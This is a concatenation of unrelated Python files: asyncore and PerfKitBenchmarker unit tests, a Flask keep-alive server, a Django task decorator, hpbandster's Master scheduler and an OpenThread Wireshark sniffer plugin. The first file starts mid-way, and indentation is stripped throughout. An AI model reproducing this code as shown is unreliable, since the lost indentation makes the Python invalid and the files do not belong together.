# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
asyncore.read(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore.write(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore._exception(tr2)
self.assertEqual(tr2.error_handled, True)
# asyncore.readwrite uses constants in the select module that
# are not present in Windows systems (see this thread:
# http://mail.python.org/pipermail/python-list/2001-October/109973.html)
# These constants should be present as long as poll is available
if hasattr(select, 'poll'):
def test_readwrite(self):
# Check that correct methods are called by readwrite()
attributes = ('read', 'expt', 'write', 'closed', 'error_handled')
expected = (
(select.POLLIN, 'read'),
(select.POLLPRI, 'expt'),
(select.POLLOUT, 'write'),
(select.POLLERR, 'closed'),
(select.POLLHUP, 'closed'),
(select.POLLNVAL, 'closed'),
)
class testobj:
def __init__(self):
self.read = False
self.write = False
self.closed = False
self.expt = False
self.error_handled = False
def handle_read_event(self):
self.read = True
def handle_write_event(self):
self.write = True
def handle_close(self):
self.closed = True
def handle_expt_event(self):
self.expt = True
def handle_error(self):
self.error_handled = True
for flag, expectedattr in expected:
tobj = testobj()
self.assertEqual(getattr(tobj, expectedattr), False)
asyncore.readwrite(tobj, flag)
# Only the attribute modified by the routine we expect to be
# called should be True.
for attr in attributes:
self.assertEqual(getattr(tobj, attr), attr==expectedattr)
# check that ExitNow exceptions in the object handler method
# bubble all the way up through the asyncore readwrite() call
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.readwrite, tr1, flag)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
self.assertEqual(tr2.error_handled, False)
asyncore.readwrite(tr2, flag)
self.assertEqual(tr2.error_handled, True)
def test_closeall(self):
self.closeall_check(False)
def test_closeall_default(self):
self.closeall_check(True)
def closeall_check(self, usedefault):
# Check that close_all() closes everything in a given map
l = []
testmap = {}
for i in range(10):
c = dummychannel()
l.append(c)
self.assertEqual(c.socket.closed, False)
testmap[i] = c
if usedefault:
socketmap = asyncore.socket_map
try:
asyncore.socket_map = testmap
asyncore.close_all()
finally:
testmap, asyncore.socket_map = asyncore.socket_map, socketmap
else:
asyncore.close_all(testmap)
self.assertEqual(len(testmap), 0)
for c in l:
self.assertEqual(c.socket.closed, True)
def test_compact_traceback(self):
try:
raise Exception("I don't like spam!")
except:
real_t, real_v, real_tb = sys.exc_info()
r = asyncore.compact_traceback()
else:
self.fail("Expected exception")
(f, function, line), t, v, info = r
self.assertEqual(os.path.split(f)[-1], 'test_asyncore.py')
self.assertEqual(function, 'test_compact_traceback')
self.assertEqual(t, real_t)
self.assertEqual(v, real_v)
self.assertEqual(info, '[%s|%s|%s]' % (f, function, line))
class DispatcherTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
def test_basic(self):
d = asyncore.dispatcher()
self.assertEqual(d.readable(), True)
self.assertEqual(d.writable(), True)
def test_repr(self):
d = asyncore.dispatcher()
self.assertEqual(repr(d), '<asyncore.dispatcher at %#x>' % id(d))
def test_log(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log() (to stderr)
fp = StringIO()
stderr = sys.stderr
l1 = "Lovely spam! Wonderful spam!"
l2 = "I don't like spam!"
try:
sys.stderr = fp
d.log(l1)
d.log(l2)
finally:
sys.stderr = stderr
lines = fp.getvalue().splitlines()
self.assertEqual(lines, ['log: %s' % l1, 'log: %s' % l2])
def test_log_info(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log_info() (to stdout via print)
fp = StringIO()
stdout = sys.stdout
l1 = "Have you got anything without spam?"
l2 = "Why can't she have egg bacon spam and sausage?"
l3 = "THAT'S got spam in it!"
try:
sys.stdout = fp
d.log_info(l1, 'EGGS')
d.log_info(l2)
d.log_info(l3, 'SPAM')
finally:
sys.stdout = stdout
lines = fp.getvalue().splitlines()
expected = ['EGGS: %s' % l1, 'info: %s' % l2, 'SPAM: %s' % l3]
self.assertEqual(lines, expected)
def test_unhandled(self):
d = asyncore.dispatcher()
d.ignore_log_types = ()
# capture output of dispatcher.log_info() (to stdout via print)
fp = StringIO()
stdout = sys.stdout
try:
sys.stdout = fp
d.handle_expt()
d.handle_read()
d.handle_write()
d.handle_connect()
d.handle_accept()
finally:
sys.stdout = stdout
lines = fp.getvalue().splitlines()
expected = ['warning: unhandled incoming priority event',
'warning: unhandled read event',
'warning: unhandled write event',
'warning: unhandled connect event',
'warning: unhandled accept event']
self.assertEqual(lines, expected)
def test_issue_8594(self):
d = asyncore.dispatcher(socket.socket())
# make sure the error message no longer refers to the socket
# object but the dispatcher instance instead
try:
d.foo
except AttributeError as err:
self.assertTrue('dispatcher instance' in str(err))
else:
self.fail("exception not raised")
# test cheap inheritance with the underlying socket
self.assertEqual(d.family, socket.AF_INET)
def test_strerror(self):
# refers to bug #8573
err = asyncore._strerror(errno.EPERM)
if hasattr(os, 'strerror'):
self.assertEqual(err, os.strerror(errno.EPERM))
err = asyncore._strerror(-1)
self.assertTrue("unknown error" in err.lower())
class dispatcherwithsend_noread(asyncore.dispatcher_with_send):
def readable(self):
return False
def handle_connect(self):
pass
class DispatcherWithSendTests(unittest.TestCase):
usepoll = False
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
def test_send(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(3)
self.port = support.bind_port(self.sock)
cap = BytesIO()
args = (self.evt, cap, self.sock)
threading.Thread(target=capture_server, args=args).start()
# wait a little longer for the server to initialize (it sometimes
# refuses connections on slow machines without this wait)
time.sleep(0.2)
data = b"Suppose there isn't a 16-ton weight?"
d = dispatcherwithsend_noread()
d.create_socket(socket.AF_INET, socket.SOCK_STREAM)
d.connect((HOST, self.port))
# give time for socket to connect
time.sleep(0.1)
d.send(data)
d.send(data)
d.send(b'\n')
n = 1000
while d.out_buffer and n > 0:
asyncore.poll()
n -= 1
self.evt.wait()
self.assertEqual(cap.getvalue(), data*2)
class DispatcherWithSendTests_UsePoll(DispatcherWithSendTests):
usepoll = True
if hasattr(asyncore, 'file_wrapper'):
class FileWrapperTest(unittest.TestCase):
def setUp(self):
self.d = b"It's not dead, it's sleeping!"
open(TESTFN, 'wb').write(self.d)
def tearDown(self):
unlink(TESTFN)
def test_recv(self):
fd = os.open(TESTFN, os.O_RDONLY)
w = asyncore.file_wrapper(fd)
os.close(fd)
self.assertNotEqual(w.fd, fd)
self.assertNotEqual(w.fileno(), fd)
self.assertEqual(w.recv(13), b"It's not dead")
self.assertEqual(w.read(6), b", it's")
w.close()
self.assertRaises(OSError, w.read, 1)
def test_send(self):
d1 = b"Come again?"
d2 = b"I want to buy some cheese."
fd = os.open(TESTFN, os.O_WRONLY | os.O_APPEND)
w = asyncore.file_wrapper(fd)
os.close(fd)
w.write(d1)
w.send(d2)
w.close()
self.assertEqual(open(TESTFN, 'rb').read(), self.d + d1 + d2)
@unittest.skipUnless(hasattr(asyncore, 'file_dispatcher'),
'asyncore.file_dispatcher required')
def test_dispatcher(self):
fd = os.open(TESTFN, os.O_RDONLY)
data = []
class FileDispatcher(asyncore.file_dispatcher):
def handle_read(self):
data.append(self.recv(29))
s = FileDispatcher(fd)
os.close(fd)
asyncore.loop(timeout=0.01, use_poll=True, count=2)
self.assertEqual(b"".join(data), self.d)
def test_main():
tests = [HelperFunctionTests, DispatcherTests, DispatcherWithSendTests,
DispatcherWithSendTests_UsePoll]
if hasattr(asyncore, 'file_wrapper'):
tests.append(FileWrapperTest)
run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
vm_util_test.py
|
# Copyright 2018 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for perfkitbenchmarker.vm_util."""
import os
import subprocess
import threading
import time
import unittest
import mock
from perfkitbenchmarker import errors
from perfkitbenchmarker import flags
from perfkitbenchmarker import vm_util
from tests import pkb_common_test_case
import psutil
FLAGS = flags.FLAGS
class ShouldRunOnInternalIpAddressTestCase(
pkb_common_test_case.PkbCommonTestCase):
def setUp(self):
super(ShouldRunOnInternalIpAddressTestCase, self).setUp()
self.sending_vm = mock.MagicMock()
self.receiving_vm = mock.MagicMock()
def _RunTest(self, expectation, ip_addresses, is_reachable=True):
FLAGS.ip_addresses = ip_addresses
self.sending_vm.IsReachable.return_value = is_reachable
self.assertEqual(
expectation,
vm_util.ShouldRunOnInternalIpAddress(
self.sending_vm, self.receiving_vm))
def testExternal_Reachable(self):
self._RunTest(False, vm_util.IpAddressSubset.EXTERNAL, True)
def testExternal_Unreachable(self):
self._RunTest(False, vm_util.IpAddressSubset.EXTERNAL, False)
def testInternal_Reachable(self):
self._RunTest(True, vm_util.IpAddressSubset.INTERNAL, True)
def testInternal_Unreachable(self):
self._RunTest(True, vm_util.IpAddressSubset.INTERNAL, False)
def testBoth_Reachable(self):
self._RunTest(True, vm_util.IpAddressSubset.BOTH, True)
def testBoth_Unreachable(self):
self._RunTest(True, vm_util.IpAddressSubset.BOTH, False)
def testReachable_Reachable(self):
self._RunTest(True, vm_util.IpAddressSubset.REACHABLE, True)
def testReachable_Unreachable(self):
self._RunTest(
False, vm_util.IpAddressSubset.REACHABLE, False)
def HaveSleepSubprocess():
"""Checks if the current process has a sleep subprocess."""
for child in psutil.Process(os.getpid()).children(recursive=True):
if 'sleep' in child.cmdline():
return True
return False
class WaitUntilSleepTimer(threading.Thread):
"""Timer that waits for a sleep subprocess to appear.
This is intended for specific tests that want to trigger timer
expiry as soon as a subprocess executing a "sleep" command is
detected.
It assumes that the test driver is not parallelizing the tests using
this method since that may lead to inconsistent results.
TODO(klausw): If that's an issue, could add a unique fractional part
to the sleep command args to distinguish them.
"""
def __init__(self, interval, function):
threading.Thread.__init__(self)
self.end_time = time.time() + interval
self.function = function
self.finished = threading.Event()
self.have_sleep = threading.Event()
def WaitForSleep():
while not self.finished.is_set():
if HaveSleepSubprocess():
self.have_sleep.set()
break
time.sleep(0) # yield to other Python threads
threading.Thread(target=WaitForSleep).start()  # watch for the sleep subprocess in a background thread
def cancel(self):
self.finished.set()
def run(self):
while time.time() < self.end_time and not self.have_sleep.is_set():
time.sleep(0) # yield to other Python threads
if not self.finished.is_set():
self.function()
self.finished.set()
class IssueCommandTestCase(pkb_common_test_case.PkbCommonTestCase):
def setUp(self):
super(IssueCommandTestCase, self).setUp()
FLAGS.time_commands = True
def testTimeoutNotReached(self):
_, _, retcode = vm_util.IssueCommand(['sleep', '0s'])
self.assertEqual(retcode, 0)
@mock.patch('threading.Timer', new=WaitUntilSleepTimer)
def testTimeoutReachedThrows(self):
with self.assertRaises(errors.VmUtil.IssueCommandTimeoutError):
_, _, _ = vm_util.IssueCommand(['sleep', '2s'], timeout=1,
raise_on_failure=False)
self.assertFalse(HaveSleepSubprocess())
@mock.patch('threading.Timer', new=WaitUntilSleepTimer)
def testTimeoutReached(self):
_, _, retcode = vm_util.IssueCommand(['sleep', '2s'], timeout=1,
raise_on_failure=False,
raise_on_timeout=False)
self.assertEqual(retcode, -9)
self.assertFalse(HaveSleepSubprocess())
def testNoTimeout(self):
_, _, retcode = vm_util.IssueCommand(['sleep', '0s'], timeout=None)
self.assertEqual(retcode, 0)
def testNoTimeout_ExceptionRaised(self):
with mock.patch('subprocess.Popen', spec=subprocess.Popen) as mock_popen:
mock_popen.return_value.wait.side_effect = KeyboardInterrupt()
with self.assertRaises(KeyboardInterrupt):
vm_util.IssueCommand(['sleep', '2s'], timeout=None)
self.assertFalse(HaveSleepSubprocess())
def testRaiseOnFailureSuppressed_NoException(self):
def _SuppressFailure(stdout, stderr, retcode):
del stdout # unused
del stderr # unused
self.assertNotEqual(
retcode, 0,
'_SuppressFailure should not have been called for retcode=0.')
return True
stdout, stderr, retcode = vm_util.IssueCommand(
['cat', 'non_existent_file'],
suppress_failure=_SuppressFailure)
# Ideally our command would produce stdout that we could verify is preserved
# but that's hard with the way IssueCommand creates local files for getting
# results from subprocess.Popen().
self.assertEqual(stdout, '')
# suppressed from
# cat: non_existent_file: No such file or directory
self.assertEqual(stderr, '')
# suppressed from 1
self.assertEqual(retcode, 0)
def testRaiseOnFailureUnsuppressed_ExceptionRaised(self):
def _DoNotSuppressFailure(stdout, stderr, retcode):
del stdout # unused
del stderr # unused
self.assertNotEqual(
retcode, 0,
'_DoNotSuppressFailure should not have been called for retcode=0.')
return False
with self.assertRaises(errors.VmUtil.IssueCommandError) as cm:
vm_util.IssueCommand(['cat', 'non_existent_file'],
raise_on_failure=True,
suppress_failure=_DoNotSuppressFailure)
self.assertIn('cat: non_existent_file: No such file or directory',
str(cm.exception))
def testRaiseOnFailureWithNoSuppression_ExceptionRaised(self):
with self.assertRaises(errors.VmUtil.IssueCommandError) as cm:
vm_util.IssueCommand(['cat', 'non_existent_file'],
raise_on_failure=True,
suppress_failure=None)
self.assertIn('cat: non_existent_file: No such file or directory',
str(cm.exception))
if __name__ == '__main__':
unittest.main()
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Hello. I am alive!"
def run():
app.run(host='0.0.0.0', port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
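# Hedged usage sketch (the surrounding bot/entry-point code is assumed, not part
# of this module): start the web server first, then run the blocking main work on
# the main thread so the process and the "/" endpoint stay up.
#
#     from keep_alive import keep_alive
#     keep_alive()          # Flask serves "/" on 0.0.0.0:8080 in a thread
#     run_main_loop()       # placeholder for the blocking entry point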
|
utils.py
|
import threading
from logging import Logger
from time import time
from typing import Callable
from django.core.management.base import BaseCommand
import metrics
def run_threaded(job_func: Callable[[], None], **kwargs):
job_thread = threading.Thread(target=job_func, kwargs=kwargs)
job_thread.start()
def job_logs_and_metrics(log: Logger):
def outer_wrapper(function):
def inner_wrapper(self: BaseCommand, *args, **kwargs):
task_name = log.name.split(".")[-1]
self.stdout.write(self.style.SUCCESS(f"starting task {task_name}"))
log.info(f"starting task {task_name}")
start = time()
try:
result = function(self, *args, **kwargs)
except Exception as error:
log.error(f"error in task {task_name}: {error}")
self.stdout.write(str(error))
self.stdout.write(self.style.ERROR(f"task {task_name} fail"))
metrics.ERRORS.labels(f"task_{task_name}").inc()
exit(1)
else:
metrics.CRONTASK.labels(task_name).inc()
success_msg = (
f"success task {task_name} - processed in {time() - start}s"
)
log.info(success_msg)
self.stdout.write(self.style.SUCCESS(success_msg))
return result
return inner_wrapper
return outer_wrapper
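# Hedged usage sketch for the decorator above (the command and logger names are
# assumptions, not part of this module):
#
#     import logging
#     log = logging.getLogger("crontasks.sync_orders")
#
#     class Command(BaseCommand):
#         @job_logs_and_metrics(log)
#         def handle(self, *args, **options):
#             ...  # task body; failures are logged, counted in metrics, then exit(1)
#
# run_threaded(job_func) simply fires job_func on a separate Thread so a
# scheduler loop is not blocked by a long-running task.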
|
master.py
|
import os
import threading
import time
import math
import pdb
import copy
import logging
import numpy as np
from hpbandster.core.dispatcher import Dispatcher
from hpbandster.core.result import Result
from hpbandster.core.base_iteration import WarmStartIteration
class Master(object):
def __init__(
self,
run_id,
config_generator,
working_directory='.',
ping_interval=60,
nameserver='127.0.0.1',
nameserver_port=None,
host=None,
shutdown_workers=True,
job_queue_sizes=(-1, 0),
dynamic_queue_size=True,
logger=None,
result_logger=None,
previous_result=None,
):
"""The Master class is responsible for the book keeping and to decide what to run next. Optimizers are
instantiations of Master, that handle the important steps of deciding what configurations to run on what
budget when.
Parameters
----------
run_id : string
A unique identifier of that Hyperband run. Use, for example, the cluster's JobID when running multiple
concurrent runs to separate them
config_generator: hpbandster.config_generators object
An object that can generate new configurations and registers results of executed runs
working_directory: string
The top level working directory accessible to all compute nodes(shared filesystem).
eta : float
In each iteration, a complete run of sequential halving is executed. In it,
after evaluating each configuration on the same subset size, only a fraction of
1/eta of them 'advances' to the next round.
Must be greater or equal to 2.
min_budget : float
The smallest budget to consider. Needs to be positive!
max_budget : float
the largest budget to consider. Needs to be larger than min_budget!
The budgets will be geometrically distributed :math:`\sim \eta^k` for
:math:`k\in [0, 1, ... , num\_subsets - 1]`.
ping_interval: int
number of seconds between pings to discover new nodes. Default is 60 seconds.
nameserver: str
address of the Pyro4 nameserver
nameserver_port: int
port of Pyro4 nameserver
host: str
ip (or name that resolves to that) of the network interface to use
shutdown_workers: bool
flag to control whether the workers are shutdown after the computation is done
job_queue_sizes: tuple of ints
min and max size of the job queue. During the run, when the number of jobs in the queue
drops to the min value, it is filled up again to the max size. Default: (-1, 0), which is
interpreted relative to the number of workers when dynamic_queue_size is True.
dynamic_queue_size: bool
Whether or not to change the queue size based on the number of workers available.
If true (default), the job_queue_sizes are relative to the current number of workers.
logger: logging.logger like object
the logger to output some (more or less meaningful) information
result_logger: hpbandster.api.results.util.json_result_logger object
a result logger that writes live results to disk
previous_result: hpbandster.core.result.Result object
previous run to warmstart the run
"""
self.working_directory = working_directory
os.makedirs(self.working_directory, exist_ok=True)
if logger is None:
self.logger = logging.getLogger('hpbandster')
else:
self.logger = logger
self.result_logger = result_logger
self.config_generator = config_generator
self.time_ref = None
self.iterations = []
self.jobs = []
self.num_running_jobs = 0
self.job_queue_sizes = job_queue_sizes
self.user_job_queue_sizes = job_queue_sizes
self.dynamic_queue_size = dynamic_queue_size
if job_queue_sizes[0] >= job_queue_sizes[1]:
raise ValueError("The queue size range needs to be (min, max) with min<max!")
if previous_result is None:
self.warmstart_iteration = []
else:
self.warmstart_iteration = [WarmStartIteration(previous_result, self.config_generator)]
# condition to synchronize the job_callback and the queue
self.thread_cond = threading.Condition()
self.config = {'time_ref': self.time_ref}
self.dispatcher = Dispatcher(self.job_callback,
queue_callback=self.adjust_queue_size,
run_id=run_id,
ping_interval=ping_interval,
nameserver=nameserver,
nameserver_port=nameserver_port,
host=host)
self.dispatcher_thread = threading.Thread(target=self.dispatcher.run)
self.dispatcher_thread.start()
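# Hedged usage sketch (optimizer and argument names are assumptions; concrete
# optimizers such as HyperBand-style subclasses build on Master):
#
#     opt = SomeOptimizer(run_id='0', config_generator=cg, nameserver='127.0.0.1')
#     result = opt.run(n_iterations=4, min_n_workers=1)
#     opt.shutdown(shutdown_workers=True)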
def shutdown(self, shutdown_workers=False):
self.logger.debug('HBMASTER: shutdown initiated, shutdown_workers = %s' %
(str(shutdown_workers)))
self.dispatcher.shutdown(shutdown_workers)
self.dispatcher_thread.join()
def wait_for_workers(self, min_n_workers=1):
"""
helper function to hold execution until some workers are active
Parameters
----------
min_n_workers: int
minimum number of workers present before the run starts
"""
self.logger.debug('wait_for_workers trying to get the condition')
with self.thread_cond:
while (self.dispatcher.number_of_workers() < min_n_workers):
self.logger.debug(
'HBMASTER: only %i worker(s) available, waiting for at least %i.' %
(self.dispatcher.number_of_workers(), min_n_workers))
self.thread_cond.wait(1)
self.dispatcher.trigger_discover_worker()
self.logger.debug('Enough workers to start this run!')
def get_next_iteration(self, iteration, iteration_kwargs):
"""
instantiates the next iteration
Override this to change the iterations for different optimizers
Parameters
----------
iteration: int
the index of the iteration to be instantiated
iteration_kwargs: dict
additional kwargs for the iteration class
Returns
-------
HB_iteration: a valid HB iteration object
"""
raise NotImplementedError('implement get_next_iteration for %s' % (type(self).__name__))
def run(
self,
n_iterations=1,
min_n_workers=1,
iteration_kwargs={},
):
"""
run n_iterations of SuccessiveHalving
Parameters
----------
n_iterations: int
number of iterations to be performed in this run
min_n_workers: int
minimum number of workers before starting the run
"""
self.wait_for_workers(min_n_workers)
iteration_kwargs.update({'result_logger': self.result_logger})
if self.time_ref is None:
self.time_ref = time.time()
self.config['time_ref'] = self.time_ref
self.logger.info('HBMASTER: starting run at %s' % (str(self.time_ref)))
self.thread_cond.acquire()
while True:
self._queue_wait()
next_run = None
# find a new run to schedule
for i in self.active_iterations():
next_run = self.iterations[i].get_next_run()
if not next_run is None: break
if not next_run is None:
self.logger.debug('HBMASTER: schedule new run for iteration %i' % i)
self._submit_job(*next_run)
continue
else:
if n_iterations > 0: #we might be able to start the next iteration
self.iterations.append(
self.get_next_iteration(len(self.iterations), iteration_kwargs))
n_iterations -= 1
continue
# at this point there is no immediate run that can be scheduled,
# so wait for some job to finish if there are active iterations
if self.active_iterations():
self.thread_cond.wait()
else:
break
self.thread_cond.release()
for i in self.warmstart_iteration:
i.fix_timestamps(self.time_ref)
ws_data = [i.data for i in self.warmstart_iteration]
return Result([copy.deepcopy(i.data) for i in self.iterations] + ws_data, self.config)
def adjust_queue_size(self, number_of_workers=None):
self.logger.debug('HBMASTER: number of workers changed to %s' % str(number_of_workers))
with self.thread_cond:
self.logger.debug('adjust_queue_size: lock acquired')
if self.dynamic_queue_size:
nw = self.dispatcher.number_of_workers(
) if number_of_workers is None else number_of_workers
self.job_queue_sizes = (self.user_job_queue_sizes[0] + nw,
self.user_job_queue_sizes[1] + nw)
self.logger.info('HBMASTER: adjusted queue size to %s' % str(self.job_queue_sizes))
self.thread_cond.notify_all()
def job_callback(self, job):
"""
method to be called when a job has finished
this will do some bookkeeping and call the user-defined
new_result_callback if one was specified
"""
self.logger.debug('job_callback for %s started' % str(job.id))
with self.thread_cond:
self.logger.debug('job_callback for %s got condition' % str(job.id))
self.num_running_jobs -= 1
if not self.result_logger is None:
self.result_logger(job)
self.iterations[job.id[0]].register_result(job)
self.config_generator.new_result(job)
if self.num_running_jobs <= self.job_queue_sizes[0]:
self.logger.debug("HBMASTER: Trying to run another job!")
self.thread_cond.notify()
self.logger.debug('job_callback for %s finished' % str(job.id))
def _queue_wait(self):
"""
helper function that, once the job queue is full, waits until it has drained below its minimum size
"""
if self.num_running_jobs >= self.job_queue_sizes[1]:
while (self.num_running_jobs > self.job_queue_sizes[0]):
self.logger.debug('HBMASTER: running jobs: %i, queue sizes: %s -> wait' %
(self.num_running_jobs, str(self.job_queue_sizes)))
self.thread_cond.wait()
def _submit_job(self, config_id, config, budget):
"""
hidden function to submit a new job to the dispatcher
This function handles the actual submission in a
(hopefully) thread-safe way
"""
self.logger.debug('HBMASTER: trying to submit job %s to dispatcher' % str(config_id))
with self.thread_cond:
self.logger.debug('HBMASTER: submitting job %s to dispatcher' % str(config_id))
self.dispatcher.submit_job(config_id,
config=config,
budget=budget,
working_directory=self.working_directory)
self.num_running_jobs += 1
#shouldn't the next line be executed while holding the condition?
self.logger.debug("HBMASTER: job %s submitted to dispatcher" % str(config_id))
def active_iterations(self):
"""
function to find active (not marked as finished) iterations
Returns
-------
list: indices of all active iterations (empty if there are none)
"""
return [i for i in range(len(self.iterations)) if not self.iterations[i].is_finished]
def __del__(self):
pass
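# --- Hedged usage sketch (not part of the original class) -------------------
# A minimal illustration of the geometric budget spacing described in the
# parameter docstring above: successive budgets differ by a factor of eta
# between min_budget and max_budget. The helper name and the literal defaults
# below are made up purely for illustration.
def _example_budgets(min_budget=1.0, max_budget=9.0, eta=3.0):
    budgets = [max_budget]
    # walk down from max_budget in steps of 1/eta while staying >= min_budget
    while budgets[-1] / eta >= min_budget:
        budgets.append(budgets[-1] / eta)
    return list(reversed(budgets))
# _example_budgets() -> [1.0, 3.0, 9.0]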
|
extcap_ot.py
|
#!/usr/bin/env python3
#
# Copyright (c) 2019, The OpenThread Authors.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import tempfile
import argparse
import subprocess
import threading
import logging
import re
from spinel.stream import StreamOpen
from spinel.const import SPINEL
from spinel.codec import WpanApi
from serial.tools.list_ports import comports
from enum import Enum
# Nodeid is required to execute ot-ncp-ftd for its sim radio socket port.
# This is the maximum that works on macOS.
DEFAULT_NODEID = 34
COMMON_BAUDRATE = [460800, 115200, 9600]
class Config(Enum):
CHANNEL = 0
BAUDRATE = 1
TAP = 2
class _StreamCloser:
def __init__(self, stream):
self._stream = stream
def __enter__(self):
return self._stream
def __exit__(self, exc_type, exc_val, exc_tb):
self._stream.close()
def extcap_config(interface, option, extcap_version):
"""List Configuration for the given interface"""
args = []
values = []
args.append((Config.CHANNEL.value, '--channel', 'Channel', 'IEEE 802.15.4 channel', 'selector', '{required=true}{default=11}'))
match = re.match(r'^(\d+)(\.\d+)*$', extcap_version)
if match and int(match.group(1)) >= 3:
args.append((Config.TAP.value, '--tap', 'IEEE 802.15.4 TAP (only for Wireshark3.0 and later)', 'IEEE 802.15.4 TAP', 'boolflag', '{default=yes}'))
for arg in args:
print('arg {number=%d}{call=%s}{display=%s}{tooltip=%s}{type=%s}%s' % arg)
values = values + [(Config.CHANNEL.value, '%d' % i, '%d' % i, 'true' if i == 11 else 'false') for i in range(11, 27)]
for value in values:
print('value {arg=%d}{value=%s}{display=%s}{default=%s}' % value)
def extcap_dlts(interface):
"""List DLTs for the given interface"""
print('dlt {number=195}{name=IEEE802_15_4_WITHFCS}{display=IEEE 802.15.4 with FCS}')
print('dlt {number=283}{name=IEEE802_15_4_TAP}{display=IEEE 802.15.4 TAP}')
def serialopen(interface, log_file):
"""
Open the serial port to identify an OpenThread sniffer
:param interface: string, eg: '/dev/ttyUSB0 - Zolertia Firefly platform', '/dev/ttyACM1 - nRF52840 OpenThread Device'
"""
sys.stdout = log_file
sys.stderr = log_file
interface = str(interface).split()[0]
baudrate = None
for speed in COMMON_BAUDRATE:
with _StreamCloser(StreamOpen('u', interface, False, baudrate=speed)) as stream, \
WpanApi(stream, nodeid=DEFAULT_NODEID, timeout=0.1) as wpan_api:
# result should not be None for both NCP and RCP
result = wpan_api.prop_get_value(SPINEL.PROP_CAPS) # confirm OpenThread Sniffer
# check whether this is an OpenThread Sniffer
if result is not None:
baudrate = speed
break
if baudrate is not None:
if sys.platform == 'win32':
# Wireshark only shows the value of the `display` key ('OpenThread Sniffer').
# The interface is therefore intentionally appended at the end (e.g. 'OpenThread Sniffer: COM0').
print('interface {value=%s:%s}{display=OpenThread Sniffer %s}' % (interface, baudrate, interface), file=sys.__stdout__, flush=True)
else:
# On Linux or macOS, Wireshark shows the concatenation of `display`
# and `interface` by default (e.g. 'OpenThread Sniffer: /dev/ttyACM0').
print('interface {value=%s:%s}{display=OpenThread Sniffer}' % (interface, baudrate), file=sys.__stdout__, flush=True)
def extcap_interfaces():
"""List available interfaces to capture from"""
log_file = open(os.path.join(tempfile.gettempdir(), 'extcap_ot_interfaces.log'), 'w')
print('extcap {version=1.0.0}{display=OpenThread Sniffer}{help=https://github.com/openthread/pyspinel}')
threads = []
for interface in comports():
th = threading.Thread(target=serialopen, args=(interface, log_file))
threads.append(th)
th.start()
for th in threads:
th.join()
def extcap_capture(interface, fifo, control_in, control_out, channel, tap):
"""Start the sniffer to capture packets"""
# baudrate = detect_baudrate(interface)
interface_port = str(interface).split(':')[0]
interface_baudrate = str(interface).split(':')[1]
with _StreamCloser(StreamOpen('u', interface_port, False, baudrate=int(interface_baudrate))) as stream, \
WpanApi(stream, nodeid=DEFAULT_NODEID) as wpan_api:
wpan_api.prop_set_value(SPINEL.PROP_PHY_ENABLED, 1)
if sys.platform == 'win32':
python_path = subprocess.Popen(
'py -3 -c "import sys; print(sys.executable)"',
stdout=subprocess.PIPE,
shell=True,
).stdout.readline().decode().strip()
sniffer_py = os.path.join(os.path.dirname(python_path), 'Scripts', 'sniffer.py')
cmd = ['python', sniffer_py]
else:
cmd = ['sniffer.py']
cmd += ['-c', channel, '-u', interface_port, '--crc', '--rssi', '-b', interface_baudrate, '-o', str(fifo),
'--is-fifo', '--use-host-timestamp']
if tap:
cmd.append('--tap')
subprocess.Popen(cmd).wait()
def extcap_close_fifo(fifo):
""""Close extcap fifo"""
# This is apparently needed to work around an issue on Windows/macOS
# where the message cannot be read. (really?)
fh = open(fifo, 'wb', 0)
fh.close()
if __name__ == '__main__':
# Capture options
parser = argparse.ArgumentParser(description='OpenThread Sniffer extcap plugin')
# Extcap Arguments
parser.add_argument('--extcap-interfaces', help='Provide a list of interfaces to capture from', action='store_true')
parser.add_argument('--extcap-interface', help='Provide the interface to capture from')
parser.add_argument('--extcap-dlts', help='Provide a list of dlts for the given interface', action='store_true')
parser.add_argument('--extcap-config', help='Provide a list of configurations for the given interface', action='store_true')
parser.add_argument('--extcap-reload-option', help='Reload elements for the given option')
parser.add_argument('--capture', help='Start the capture routine', action='store_true')
parser.add_argument('--fifo', help='Use together with capture to provide the fifo to dump data to')
parser.add_argument('--extcap-capture-filter', help='Used together with capture to provide a capture filter')
parser.add_argument('--extcap-control-in', help='Used to get control messages from toolbar')
parser.add_argument('--extcap-control-out', help='Used to send control messages to toolbar')
parser.add_argument('--extcap-version', help='Wireshark Version')
# Interface Arguments
parser.add_argument('--channel', help='IEEE 802.15.4 capture channel [11-26]')
parser.add_argument('--tap', help='IEEE 802.15.4 TAP (only for Wireshark3.0 and later)', action='store_true')
try:
args, unknown = parser.parse_known_args()
except argparse.ArgumentError as e:
parser.exit('ERROR_ARG: %s' % str(e))
extcap_version = ''
version_path = os.path.join(tempfile.gettempdir(), 'extcap_ot_version')
if args.extcap_version:
extcap_version = args.extcap_version
with open(version_path, mode='w') as f:
f.write(extcap_version)
else:
try:
with open(version_path, mode='r') as f:
extcap_version = f.read()
except FileNotFoundError:
pass
